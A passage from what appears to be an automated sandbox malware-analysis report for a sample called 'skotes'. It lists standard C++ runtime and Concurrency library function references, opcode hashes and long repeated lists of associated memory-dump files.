                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980665830.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980796943.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980939158.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981125789.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981254982.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981448988.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981597675.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981781764.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981910800.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Xtime_diff_to_millis2_xtime_get
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 531285432-0
                                                                                                                                                                                                                                          • Opcode ID: 33410e916b34419bdf083195ce92f2ab74d291df0eaee794bb87bf4733661874
                                                                                                                                                                                                                                          • Instruction ID: c1034d018e4d5d807eece966ff2eea3c3e0240c48f0bfd06f3875702650fe5c1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 33410e916b34419bdf083195ce92f2ab74d291df0eaee794bb87bf4733661874
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0821EBB5A00119AFDF00FBA4D885DBEBBB9EF48710F1040A5FA01A7261DB349D05DBA1
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • __EH_prolog3_catch.LIBCMT ref: 00B99C9C
                                                                                                                                                                                                                                          • Concurrency::SchedulerPolicy::_ValidPolicyValue.LIBCONCRT ref: 00B99CE8
                                                                                                                                                                                                                                          • std::bad_exception::bad_exception.LIBCMT ref: 00B99CFE
                                                                                                                                                                                                                                          • std::bad_exception::bad_exception.LIBCMT ref: 00B99D6A
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2973332284.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973183378.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973332284.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973940335.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974116469.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974330158.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974509112.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974706941.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975510008.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975673102.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975858151.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976010191.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976372810.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976588375.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976731520.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976855106.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977036956.0000000000D91000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977145651.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977257068.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977385733.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977565674.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978449942.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978640930.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978752510.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978864602.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978946296.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979012965.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979113130.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979526112.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979623514.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979728075.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979818464.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979915094.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980008821.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980111926.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980665830.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980796943.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980939158.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981125789.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981254982.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981448988.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981597675.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981781764.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981910800.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: std::bad_exception::bad_exception$Concurrency::H_prolog3_catchPolicyPolicy::_SchedulerValidValue
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2033596534-0
                                                                                                                                                                                                                                          • Opcode ID: 772541e0a0c405436af895244e531f4407373a4e12893bf40a4faf571198f99f
                                                                                                                                                                                                                                          • Instruction ID: 6e7f328741835c4e88a06c0fdfc02318384861af381d60e1faa9ec46a2f279f5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 772541e0a0c405436af895244e531f4407373a4e12893bf40a4faf571198f99f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 51213B769046059FDF45EF68D8829ADB7E5AF05710B2040FEF011AB2A2EB716E01CB51
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Concurrency::details::SchedulerProxy::IncrementFixedCoreCount.LIBCONCRT ref: 00B9A069
                                                                                                                                                                                                                                            • Part of subcall function 00B9B560: Concurrency::details::SchedulerProxy::ToggleBorrowedState.LIBCONCRT ref: 00B9B5AF
                                                                                                                                                                                                                                          • Concurrency::details::HardwareAffinity::HardwareAffinity.LIBCMT ref: 00B9A07F
                                                                                                                                                                                                                                          • Concurrency::details::SchedulerProxy::AddExecutionResource.LIBCONCRT ref: 00B9A0CB
                                                                                                                                                                                                                                            • Part of subcall function 00B9AB41: List.LIBCONCRT ref: 00B9AB77
                                                                                                                                                                                                                                          • Concurrency::details::ExecutionResource::SetAsCurrent.LIBCMT ref: 00B9A0DB
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2973332284.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973183378.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973332284.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973940335.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974116469.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974330158.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974509112.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974706941.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975510008.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975673102.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975858151.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976010191.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976372810.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976588375.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976731520.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976855106.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977036956.0000000000D91000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977145651.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977257068.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977385733.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977565674.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978449942.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978640930.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978752510.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978864602.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978946296.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979012965.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979113130.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979526112.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979623514.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979728075.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979818464.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979915094.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980008821.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980111926.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980665830.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980796943.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980939158.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981125789.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981254982.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981448988.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981597675.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981781764.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981910800.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Concurrency::details::$Proxy::Scheduler$ExecutionHardware$AffinityAffinity::BorrowedCoreCountCurrentFixedIncrementListResourceResource::StateToggle
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 932774601-0
                                                                                                                                                                                                                                          • Opcode ID: 3689dd2ca53af6d3d7873a4b047552c3454cf841b556ca89f62e80e2f5887232
                                                                                                                                                                                                                                          • Instruction ID: 98a3c3c542d4f9332d2a7b077d498fdfac85d2407715115bc3dcdfdf586cc962
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3689dd2ca53af6d3d7873a4b047552c3454cf841b556ca89f62e80e2f5887232
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C1219D325007149FCB25EF65D9908ABF3F9FF587007004AAEE442A7651DB74F905CBA2
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ListArray.LIBCONCRT ref: 00B94893
                                                                                                                                                                                                                                          • ListArray.LIBCONCRT ref: 00B948A5
                                                                                                                                                                                                                                            • Part of subcall function 00B95555: _InternalDeleteHelper.LIBCONCRT ref: 00B95564
                                                                                                                                                                                                                                          • ListArray.LIBCONCRT ref: 00B948AF
                                                                                                                                                                                                                                          • _InternalDeleteHelper.LIBCONCRT ref: 00B948C8
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2973332284.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973183378.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973332284.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973940335.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974116469.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974330158.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974509112.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974706941.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975510008.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975673102.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975858151.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976010191.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976372810.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976588375.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976731520.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976855106.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977036956.0000000000D91000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977145651.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977257068.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977385733.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977565674.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978449942.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978640930.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978752510.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978864602.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978946296.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979012965.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979113130.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979526112.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979623514.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979728075.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979818464.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979915094.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980008821.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980111926.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980665830.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980796943.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980939158.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981125789.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981254982.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981448988.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981597675.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981781764.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981910800.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ArrayList$DeleteHelperInternal
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3844194624-0
                                                                                                                                                                                                                                          • Opcode ID: b1172bf21dd97a30167eb4809526a992360b826f18a35220b126eec2a7410936
                                                                                                                                                                                                                                          • Instruction ID: 3f5cf4dce804314c1770c64574bec035425a0ec27668f9640b6bc76170ddcb76
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b1172bf21dd97a30167eb4809526a992360b826f18a35220b126eec2a7410936
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1C01D671601521AFCF267B64D8C2E6EB7EAFF4571070101B9F80497652CB60EC22C7A1
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ListArray.LIBCONCRT ref: 00B9EE6A
                                                                                                                                                                                                                                          • ListArray.LIBCONCRT ref: 00B9EE7C
                                                                                                                                                                                                                                            • Part of subcall function 00B9EF29: _InternalDeleteHelper.LIBCONCRT ref: 00B9EF3B
                                                                                                                                                                                                                                          • ListArray.LIBCONCRT ref: 00B9EE86
                                                                                                                                                                                                                                          • _InternalDeleteHelper.LIBCONCRT ref: 00B9EE9F
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2973332284.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973183378.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973332284.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973940335.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974116469.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974330158.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974509112.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974706941.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975510008.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975673102.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975858151.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976010191.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976372810.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976588375.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976731520.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976855106.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977036956.0000000000D91000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977145651.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
